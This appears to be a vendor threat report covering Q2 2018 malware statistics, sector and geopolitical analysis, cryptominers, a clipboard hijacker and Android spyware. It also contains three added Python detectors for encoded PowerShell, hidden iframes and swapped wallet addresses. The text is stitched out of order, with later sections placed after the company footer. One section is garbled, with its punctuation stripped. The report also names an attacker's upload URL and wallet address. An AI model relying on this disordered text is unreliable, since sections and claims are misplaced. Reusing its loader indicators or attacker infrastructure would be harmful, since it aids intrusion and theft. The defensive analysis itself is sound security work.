The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2 Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2 Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018 Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location

In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are numbers 2 and 3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose, either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC.

VISIT COMODO.COM

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531; Tel: +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394; sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800; www.comodo.co.in

About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below you see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.

BadShell at work


The malicious code in the registry
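The decoding step described above, as an added defender-side example (this is not Comodo's code; the registry path, value name and command lines in it are constructed for the illustration): it unpacks the -EncodedCommand argument of a captured powershell.exe command line (base64 over UTF-16LE, which is what that flag expects) and lists the loader indicators the report names, such as a registry read of the payload, base64 decoding and a hidden window, so that a process-creation log entry can be triaged without executing anything.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Added illustration, not Comodo's code. It triages a process command line for
# the BadShell-style pattern described above: powershell.exe started with an
# encoded command that pulls a payload out of the registry and base64-decodes
# it. The registry path, value name and command lines below are constructed.

# powershell.exe accepts -e, -ec, -en, -enc and -EncodedCommand for the same flag.
ENCODED_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Launch-time indicators, checked against the raw command line.
OUTER_INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "encoded_command": ENCODED_ARG,
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "no_profile": re.compile(r"-nop\b|-noprofile", re.IGNORECASE),
}

# Script-body indicators, checked against the decoded script (or against the
# plain command line when nothing was encoded).
SCRIPT_INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "registry_read": re.compile(r"Get-ItemProperty|HKCU:|HKLM:|Registry::", re.IGNORECASE),
    "base64_decode": re.compile(r"FromBase64String", re.IGNORECASE),
    "scheduled_task": re.compile(r"schtasks|Register-ScheduledTask|New-ScheduledTask", re.IGNORECASE),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
}


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind an encoded-command flag, or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> Dict[str, object]:
    """Decode the command if it is encoded and list the loader indicators present."""
    decoded = decode_encoded_command(cmdline)
    script_text = decoded if decoded is not None else cmdline
    hits: List[str] = [n for n, p in OUTER_INDICATORS.items() if p.search(cmdline)]
    hits += [n for n, p in SCRIPT_INDICATORS.items() if p.search(script_text)]
    # One flag alone (e.g. -NoProfile) is common in legitimate automation;
    # two or more together is the combination worth escalating.
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


# Constructed samples: a BadShell-like launch and a benign one.
SAMPLE_SCRIPT = (
    "$p = (Get-ItemProperty -Path 'HKCU:\\Software\\Example' -Name 'Payload').Payload\n"
    "$b = [System.Convert]::FromBase64String($p)\n"
)
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + encode_powershell(SAMPLE_SCRIPT)
)
BENIGN_CMDLINE = "powershell.exe -NoProfile -Command Get-Date"

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        result = analyze_command_line(line)
        print(result["suspicious"], result["indicators"])
```

The two-indicator threshold is only a starting point: a lone -NoProfile is routine in administrative scripting, whereas an encoded command that also reads a registry value and base64-decodes it is the BadShell combination worth alerting on. Command lines of this shape come from process-creation telemetry such as Sysmon event ID 1 or Windows Security event 4688 with command-line auditing enabled.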


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background looking for antivirus products and disables them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature will terminate its processes.

CoinMiner kills its rivals as follows:

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way, CoinMiner undividedly occupies the victim's computer to use its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing user detection. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking websites' code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we can find the familiar link to CoinHive.

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
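A static check for the hiding technique just described, as an added example that is not Comodo's code: it parses a page's HTML, records every iframe with its size and host, base64-decodes atob(...) payloads found in inline scripts and scans the decoded markup for iframes too, then flags frames that are 1x1 or hidden, point at a host named in the report (coinhive.com or cnhv.co), or were emitted from decoded script. The report does not say how the string on the page was encoded; base64 via atob() is assumed here, and the sample page and its cnhv.co path are constructed. Nothing in the page is executed; the script text is only decoded and re-parsed.

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Added illustration, not Comodo's code. Hosts named in the report: the
# CoinHive service itself and its cnhv.co shortener.
MINER_HOSTS = {"coinhive.com", "cnhv.co"}

# atob("...") with a base64 payload: the assumed way the iframe was obfuscated.
ATOB_PAYLOAD = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)


class _Collector(HTMLParser):
    """Collect iframe attributes and inline script bodies from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, Optional[str]]] = []
        self.scripts: List[str] = []
        self._in_script = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.scripts.append("".join(self._buf))
            self._buf, self._in_script = [], False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def _dimension(value: Optional[str]) -> Optional[int]:
    """Parse a width/height attribute such as "1" or "1px"; None if not numeric."""
    if value is None:
        return None
    try:
        return int(value.strip().lower().replace("px", ""))
    except ValueError:
        return None


def _known_miner_host(src: Optional[str]) -> bool:
    host = urlparse(src or "").hostname or ""
    return any(host == h or host.endswith("." + h) for h in MINER_HOSTS)


def _decode_atob_payloads(script: str) -> List[str]:
    decoded = []
    for payload in ATOB_PAYLOAD.findall(script):
        try:
            decoded.append(base64.b64decode(payload, validate=True).decode("utf-8", "replace"))
        except binascii.Error:
            continue
    return decoded


def find_iframes(html: str, via: str = "inline", depth: int = 0) -> List[Dict[str, object]]:
    """One finding per iframe, including iframes hidden inside atob() payloads."""
    collector = _Collector()
    collector.feed(html)
    findings: List[Dict[str, object]] = []
    for attrs in collector.iframes:
        width, height = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
        reasons = []
        if (width is not None and width <= 1) or (height is not None and height <= 1) \
                or HIDDEN_STYLE.search(attrs.get("style") or ""):
            reasons.append("hidden_or_1x1")
        if _known_miner_host(attrs.get("src")):
            reasons.append("known_miner_host")
        if via == "decoded":
            reasons.append("written_from_decoded_script")
        findings.append({"src": attrs.get("src"), "via": via, "reasons": reasons,
                         "flag": len(reasons) >= 2})
    if depth < 2:  # follow at most two layers of atob() nesting
        for script in collector.scripts:
            for markup in _decode_atob_payloads(script):
                findings.extend(find_iframes(markup, via="decoded", depth=depth + 1))
    return findings


# Constructed sample page: a visible third-party widget plus a 1x1 frame to
# the shortener, emitted only after base64 decoding in an inline script.
HIDDEN_FRAME = '<iframe src="https://cnhv.co/constructed-example" width="1" height="1"></iframe>'
SAMPLE_PAGE = (
    "<html><body><h1>Constructed sample page</h1>\n"
    '<script>document.write(atob("' + base64.b64encode(HIDDEN_FRAME.encode()).decode() + '"));</script>\n'
    '<iframe src="https://example.org/widget" width="300" height="200"></iframe>\n'
    "</body></html>"
)

if __name__ == "__main__":
    for finding in find_iframes(SAMPLE_PAGE):
        print(finding)
```

A visible frame to an unknown host yields no reasons, so it is not flagged; a 1x1 frame that only appears after decoding an inline script is flagged even when its host is not on the list, which is what catches a shortener that has not been seen before.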

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string combining different characters and numbers, so it is almost impossible to remember it or fill it in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it changes it to the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added the malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world
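The user-side countermeasure that follows from the example above, as an added illustration rather than Comodo's code: remember the address the user actually copied and refuse to paste a wallet address that differs from it. Address formats are recognised by pattern only (no checksum is verified), the two addresses are the ones quoted in the report, and the copy-then-paste sequence is constructed.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Added illustration, not Comodo's code. Models the check a clipboard guard or
# wallet front-end can make before a paste: does the clipboard still hold the
# address the user copied? The addresses are those quoted in the report; the
# event sequence is constructed.

# Pattern-only recognition of common wallet formats (no checksum verification).
ADDRESS_PATTERNS = {
    "btc_p2pkh": re.compile(r"^1[1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc_p2sh": re.compile(r"^3[1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{11,71}$", re.IGNORECASE),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify_address(text: str) -> Optional[str]:
    """Return the wallet format the text looks like, or None for ordinary text."""
    candidate = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(candidate):
            return kind
    return None


@dataclass
class ClipboardGuard:
    """Tracks the last address the user copied and vets the clipboard before paste."""
    trusted: Optional[str] = None
    alerts: List[str] = field(default_factory=list)

    def on_user_copy(self, text: str) -> None:
        # Only remember copies that are wallet addresses; other text is irrelevant.
        if classify_address(text):
            self.trusted = text.strip()

    def check_before_paste(self, clipboard_now: str) -> bool:
        """True if pasting is safe; False (with an alert) if the address was swapped."""
        current = clipboard_now.strip()
        kind = classify_address(current)
        if kind is None or self.trusted is None or current == self.trusted:
            return True
        self.alerts.append(
            f"clipboard {kind} address {current} differs from copied {self.trusted}"
        )
        return False


# Constructed event sequence using the report's two addresses: the user copies
# the legitimate P2SH address, and a hijacker replaces it before the paste.
COPIED_ADDRESS = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
SWAPPED_ADDRESS = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"


def run_scenario() -> List[str]:
    """Replay the copy/swap sequence and return the alerts the guard raised."""
    guard = ClipboardGuard()
    guard.on_user_copy(COPIED_ADDRESS)
    guard.check_before_paste(SWAPPED_ADDRESS)  # hijacked: refused and alerted
    return guard.alerts


if __name__ == "__main__":
    for alert in run_scenario():
        print("ALERT:", alert)
```

A real guard would hook the OS clipboard; here the events are fed in by calling on_user_copy and check_before_paste directly. The comparison is exact, so it does not rely on the user spotting the difference between two long strings by eye.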

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals the owner's account details and contacts (id, name, phone numbers and email address). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the "AES" algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. Also, it extracts the web history, account and contact details and the device information.

